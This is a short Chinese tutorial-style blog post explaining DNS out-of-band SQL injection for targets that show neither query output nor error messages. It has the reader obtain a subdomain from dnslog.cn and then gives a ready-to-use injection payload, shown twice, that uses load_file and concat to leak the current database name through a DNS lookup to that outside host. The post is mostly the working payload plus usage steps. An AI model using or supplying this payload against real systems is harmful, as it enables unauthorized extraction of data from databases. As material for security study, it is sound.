dns回显注入的使用场景
当目标无显示位也无错误回显时便可使用此方法
1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址
2、将获取到的地址复制填入SQL语句中执行
注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可
注入语句:
id=1’ and load_file(concat("\\\\",(database()),".2bmfvu.dnslog.cn
\\1.txt")) – -
爱国小白帽 ©著作权
文章标签 SQL注入 文章分类 SQL Server 数据库
当目标无显示位也无错误回显时便可使用此方法
注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可
注入语句:
id=1’ and load_file(concat("\\\\",(database()),".2bmfvu.dnslog.cn
\\1.txt")) – -
DNSLog.cn
网站会看到回显结果为security
效果如图:上一篇:SQL注入篇——文件读写注入
下一篇:SQL注入篇——二次注入
【SQL注入-有回显】
DNS注入其实也就是sql注入的一种原理域名DNS指向的是我们服务器的域名,意味着解析域名时需向DNS服务器查询。通过递归查询可以获取数据库上的信
举报文章
请选择举报类型
补充说明
0/200
上传截图
格式支持JPEG/PNG/JPG,图片不超过1.9M